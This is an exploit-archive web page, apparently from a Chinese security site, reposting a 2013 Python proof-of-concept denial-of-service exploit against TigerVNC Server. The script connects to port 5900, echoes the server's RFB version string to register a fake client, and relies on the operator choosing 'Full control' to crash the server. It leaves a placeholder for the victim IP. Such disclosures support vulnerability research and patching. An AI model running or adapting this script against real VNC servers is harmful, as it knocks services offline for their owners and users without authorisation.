TigerVNC Server Remote DoS Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

TigerVNC Server Remote DoS Vulnerability

来源：z3r0n3@mail.com 作者：Z3r0n3 发布时间：2013-07-30

#!/usr/bin/env python

#================================================================#

# [+] Title: TigerVNC Server Remote DoS Vulnerability #

# [+] Discovered: 28/07/2013 #

# [+] Software Vendor: http://sourceforge.net/projects/tigervnc/ #

# [+] Author: Z3r0n3 - Independent Security Researcher           #

# [+] Contact: z3r0n3@mail.com #

# [+] Overview: #

# A remote attacker can crash TigerVNC server by creating #

# a fake client. after registring the client, any control #

# the server try to do (View-only, Full control...) on the #

# client can bring the server down (No one play with clients!) #

#================================================================#

import socket, sys;

def SrvRecv():

global srvmsg;

srvmsg=client.recv(1024);

print("[<-] Srv: ", srvmsg);

host="localhost"; # Put Victim IP here

port=5900;

print("[+] Creating socket...");

client=socket.socket(socket.AF_INET, socket.SOCK_STREAM);

try:

print("[+] Trying to connect with TigerVNC server...");

client.connect((host,port));

except socket.error:

print("[!] Can't connect...");

client.close()

sys.exit()

print("[x] Connected...");

SrvRecv()

client.send(srvmsg) # srvmsg="RFB XXX.XXX"

print("""[x] Go to TigerVNC server and click on Full control to obtain a full crash""")

x=input("[x] Don't press anything till the server is down");

client.close();

[

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

推荐广告